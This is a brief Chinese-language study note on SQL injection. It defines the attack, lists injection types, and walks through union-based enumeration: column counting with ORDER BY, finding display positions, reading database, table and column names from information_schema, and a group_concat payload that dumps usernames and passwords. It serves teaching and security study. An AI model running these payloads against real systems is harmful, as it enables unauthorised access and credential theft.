sql注入
?什么是sql注入
利用数据库管理系统的能力,攻击者通过将构造的SQL playload附加到前端提交的参数中,导致后台拼接后的SQL语句,被数据库执行产生预期外效果
?sql注入的分类
总体说分两类:数据型注入和字符型注入
按照其他分类方法,还有常见数据库注入:盲注,延时注入,宽字节注入,二次注入,堆叠注入
?如何发现sqli注入漏洞
1.寻找注入点:
一个可以和后台,数据库交互的地方
2.判断后台列数:
用order by 查找前面select的列数
3.寻找显示位:
用id =-1 union select 1,2,3,4 查找显示的地方
4.寻找库名:
select database();
select schema from information_schema; 可以找到所有的数据库库名
5.找表名:
select table_name from information_schema.tables where table_schema=“security”;
6.找字段名:
select column_name from information_schema.columns where table_schema=“库名” and table_name=“表名”;
group_concat(concat_ws(",",username,password)) from database.table limit 0,5;
补充: mysql数据库中的infomation_schema数据库:
在MySQL中,把 information_schema
看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。
sql注入中常用的几个表:
schemate 表:提供了当前mysql实例中所有数据库的信息
tables表:提供了关于数据库中表的信息。
【谈谈sql注入的那些事】columns表:提供了表中列的信息
